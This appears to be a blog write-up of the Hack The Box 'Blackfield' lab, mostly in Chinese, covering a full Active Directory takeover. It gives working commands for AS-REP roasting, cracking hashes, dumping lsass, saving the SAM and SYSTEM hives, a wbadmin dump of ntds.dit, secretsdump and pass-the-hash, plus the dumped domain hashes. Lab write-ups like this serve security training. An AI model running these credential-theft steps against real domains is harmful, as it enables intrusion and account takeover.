Zumpyx Blog

Blackfield

Machines#255HardWindows

Recon & Enum

export IP=10.10.10.192

  • nmap -sC -A -p- --min-rate 1000 -T4 $IP
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-12 10:45:02Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49676/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h59m59s
| smb2-time: 
|   date: 2024-01-12T10:46:11
|_  start_date: N/A
  • crackmapexec smb $IP -u guest -p '' --shares

Pasted+image+20240112105221.png

没有翻到什么可用的文件信息

  • crackmapexec smb $IP -u guest -p '' --rid-brute 10000

Pasted+image+20240112105410.png

  • 爆出的用户
Administrator
DC01$ 
DnsAdmins 
DnsUpdateProxy 
Guest 
PC01$
SRV-EXCHANGE$ 
SRV-FILE$ 
SRV-INTRANET$ 
SRV-WEB$  
audit2020 
krbtgt 
lydericlefebvre 
support 
svc_backup
- AS-REP Roasting 得到 `[email protected]` Hash

Pasted+image+20240112111119.png

  • ldapsearch -x -H "ldap://$IP" -s base namingContexts

Pasted+image+20240112110200.png

  • ldapsearch -x -H "ldap://$IP" -b "DC=BLACKFIELD,DC=local"

Pasted+image+20240112111207.png

Shell as User - support

  • 爆破 Hash hashcat -m 18200 hash.list /usr/share/wordlists/rockyou.txt

Pasted+image+20240112111439.png

  • 尝试登录用户 support:#00^BlackKnight

Pasted+image+20240112113337.png

提示认证失败

  • 查看用户 samba 权限

Pasted+image+20240112113442.png

目录可读,但是没什么东西

Shell as User - AUDIT2020

  • 遛狗,发现可以重置密码

Pasted+image+20240112140713.png

https://www.thehacker.recipes/a-d/movement/dacl/forcechangepassword

Pasted+image+20240112140754.png

Pasted+image+20240112141019.png

  • bloodhound 看到没有远程管理的权限,发现新的 samba 目录

Pasted+image+20240112141243.png

  • smbclient -U BLACKFIELD.local/AUDIT2020 //10.10.10.192/forensic

Pasted+image+20240112141630.png

Shell as User - svc_backup

发现内存 lsass 相关文件,尝试 pypykatz lsa minidump lsass.DMP

Pasted+image+20240112142315.png

svc_backup:9658d1d1dcd9250115e2205d9f48400d
administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62
  • 经过尝试 svc_backup 可以登录

Pasted+image+20240112143358.png

  • 拥有备份权限,直接备份
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#a-d-attack

  • 域环境可以使用 wbadmin.exe.exe 来 dump NTDS.dit

Pasted+image+20240112152901.png

看到 svc_backup 账户可以写入 samba/C$

# 创建目录挂载到 V 盘
net use V: \\10.10.10.192\C$\temp2 /user:smbuser password
# 测试
echo test > c:\temp2\test.txt
dir v:\

echo "Y" | wbadmin start backup -backuptarget:\\10.10.10.192\C$\temp2 -include:c:\windows\ntds
wbadmin get versions
# 更换上面看到的版本时间
echo "Y" | wbadmin start recovery -version:01/12/2024-15:26 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\temp2 -notrestoreacl

操作完成后,可以在 C:\temp2 看到 ntds.dit

Pasted+image+20240112153040.png

impacket-secretsdump -sam sam.bak -system system.bak -ntds ntds.dit local

Pasted+image+20240112154133.png

  • evil-winrm -i 10.10.10.192 -u 'administrator' -H '184fb5e5178480be64824d4cd53b99ee'

Pasted+image+20240112154230.png

Hash dump

impacket-secretsdump -sam sam.bak -system system.bak -ntds ntds.dit local
---
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:8dc97ba2120794582ea63a4c790da901:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:570a9a65db8fba761c1008a51d4c95ab:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::